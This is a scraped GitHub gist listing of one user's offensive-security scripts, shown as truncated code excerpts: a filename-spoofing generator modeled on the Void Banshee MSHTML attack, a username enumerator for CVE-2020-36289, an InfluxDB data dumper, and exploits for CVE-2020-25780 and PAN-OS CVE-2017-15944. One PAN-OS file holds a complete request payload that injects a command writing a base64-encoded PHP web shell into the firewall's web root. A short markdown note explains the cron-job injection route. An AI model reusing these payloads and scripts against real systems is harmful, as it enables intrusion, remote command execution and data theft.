
import argparse
import os
import urllib.parse
# Reference: https://vulnera.com/newswire/void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability/?utm_source=rss&utm_medium=rss&utm_campaign=void-banshee-apt-group-exploits-windows-mshtml-spoofing-vulnerability
# Twenty-six copies of U+2800 (BRAILLE PATTERN BLANK), percent-encoded as
# UTF-8 ("%E2%A0%80" per character). The character renders as blank but is
# not an ordinary space, which is what makes a name containing it display
# misleadingly. Detection note: the byte run E2 A0 80 repeated in a filename
# or URL is a simple thing to match on.
BRAILLE_WHITESPACE = urllib.parse.quote("\u2800" * 26)
def create_spoofed_file(input_file, output_base, fake_extension):
milo2012 / CVE-2020-36289.py
Created August 6, 2024 03:43
CVE-2020-36289.py
import requests
import argparse
import re
from concurrent.futures import ThreadPoolExecutor, as_completed
from requests.packages.urllib3.exceptions import InsecureRequestWarning
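# Silence urllib3's whole HTTPWarning family. This already covers
# InsecureRequestWarning (a SecurityWarning, itself an HTTPWarning), so the
# separate call for that one class was redundant and is dropped.
# Consequence worth knowing: requests made with verify=False will no longer
# warn that TLS certificate validation is off, so that condition is invisible
# at runtime.
requests.packages.urllib3.disable_warnings()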
def check_usernames(file_path, base_url, num_threads):
milo2012 / searchMSIGetCustomActions.ps1
Last active July 25, 2024 08:26
searchMSIGetCustomActions.ps1
function Get-CustomActionsFromMSI {
param (
[string]$msiPath
)
try {
# Load the Windows Installer COM object
$installer = New-Object -ComObject WindowsInstaller.Installer
# Open the MSI database in read-only mode
import argparse
import requests
import re
def main():
# Parse command line arguments
parser = argparse.ArgumentParser(description='Dump data from a specific measurement/table in an InfluxDB instance via HTTP API.')
parser.add_argument('-u', '--url', type=str, required=True, help='URL of the InfluxDB query endpoint')
parser.add_argument('-d', '--database', type=str, help='Name of the database')
parser.add_argument('-t', '--table', type=str, help='Name of the measurement/table')
milo2012 / sendKeys.go
Created January 27, 2023 19:54
sendKeys.go
package main
import (
//"flag"
"log"
"fmt"
"strings"
"time"
"github.com/stephen-fox/user32util"
)
// NOTE(review): a bare 1 assigned to a time.Duration is one nanosecond, not
// one second. If a one-second wait was intended this should read
// 1 * time.Second. Every use of timeout is outside this excerpt — confirm
// against the callers before changing it.
var timeout time.Duration = 1
milo2012 / CVE-2020-25780.py
Created February 8, 2022 06:11
CVE-2020-25780.py
import optparse
import requests
import xml.etree.ElementTree as ET
import xmltodict
import base64
def fixed_xml_body_as_string(filename):
text='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">'
text+=' <soapenv:Header/>'
text+=' <soapenv:Body>'
milo2012 / CVE-2017-15944_1.py
Created July 19, 2021 14:29
CVE-2017-15944_1.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
# Suppress urllib3's HTTPWarning family; after this a request made with
# verify=False gives no warning that certificate validation is off.
requests.packages.urllib3.disable_warnings()
# Module-level Session, presumably reused by the step functions below so
# cookies and connection state persist between requests — the callers are
# outside this excerpt, so confirm before relying on that.
session = requests.Session()
def step3_exp():
    """Return the fixed request body this PoC sends as its third step.

    The body is a single opaque, hard-coded JSON-RPC string (escaped quotes
    and a trailing NUL escape included) written for the original target.
    Nothing in it is parameterised, so it cannot be reused without editing
    the literal itself; compare the ``step3_exp(command)`` variant in the
    companion gist, which takes the command as an argument.

    Returns:
        str: the request body, exactly as embedded in the source.
    """
    exp_post = "{\"action\":\"PanDirect\",\"method\":\"execute\",\"data\":[\"07c5807d0d927dcd0980f86024e5208b\",\"Administrator.get\",{\"changeMyPassword\":true,\"template\":\"asd\",\"id\":\"admin']\\\" async-mode='yes' refresh='yes' cookie='../../../../../../var/cores/$(echo PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==|base64 -d >${PATH:0:1}var${PATH:0:1}appweb${PATH:0:1}htdocs${PATH:0:1}api${PATH:0:1}cmd.php).core -print -exec python -c exec(\\\"PD9waHAgc3lzdGVtKCRfR0VUWyJjIl0pOz8+Cg==\\\".decode(\\\"base64\\\")) ;'/>\\u0000\"}],\"type\":\"rpc\",\"tid\":713}"
    return exp_post
milo2012 / CVE-2017-15944_2.py
Last active July 19, 2021 14:26
CVE-2017-15944_2.py
#!/usr/bin/env python
# encoding: utf-8
import requests
import sys
import base64
import time
# Suppress urllib3's HTTPWarning family; after this a request made with
# verify=False gives no warning that certificate validation is off.
requests.packages.urllib3.disable_warnings()
# Module-level Session, presumably shared by the step functions below —
# their bodies are outside this excerpt.
session = requests.Session()
# Remote directory path baked in for the original target; presumably consumed
# by step3_exp(command) below (its body is outside this excerpt). Confirm
# the value before reusing the script elsewhere.
path = "/opt/var.cp/cores"
def step3_exp(command):
milo2012 / CVE-2017-15944.md
Last active June 22, 2023 08:07
CVE-2017-15944.md

Description

I encountered a situation where the target running PAN-OS was vulnerable to CVE-2017-15944 but I was unable to exploit it using Metasploit.

The issue with exploiting CVE-2017-15944

One of the techniques for exploiting CVE-2017-15944 is to create a file under /opt/pancfg/mgmt/logdb/traffic/1/*, which then gets processed by the cron job (/etc/cron.d/indexgen -> /usr/local/bin/genindex_batch.sh). Metasploit uses this technique.

The article at https://tinyhack.com/2019/01/10/alternative-way-to-exploit-cve-2017-15944-on-pan-os-6-1-0/ mentions that it might be impossible to exploit CVE-2017-15944 as the script is already running. The article mentions that the cron job (/etc/cron.d/core_compress -> /usr/local/bin/core_compress) is also vulnerable to command injection.

milo2012 / searchKaliPkg.py
Last active May 17, 2021 04:11
Search Kali Repo (http.kali.org)
import sys
import requests
import optparse
from bs4 import BeautifulSoup
import multiprocessing
from requests.packages.urllib3.exceptions import InsecureRequestWarning
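# Silence urllib3's whole HTTPWarning family. This already covers
# InsecureRequestWarning (a SecurityWarning, itself an HTTPWarning), so the
# separate call for that one class was redundant and is dropped.
# Consequence worth knowing: requests made with verify=False will no longer
# warn that TLS certificate validation is off, so that condition is invisible
# at runtime.
requests.packages.urllib3.disable_warnings()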
def getHTML(url):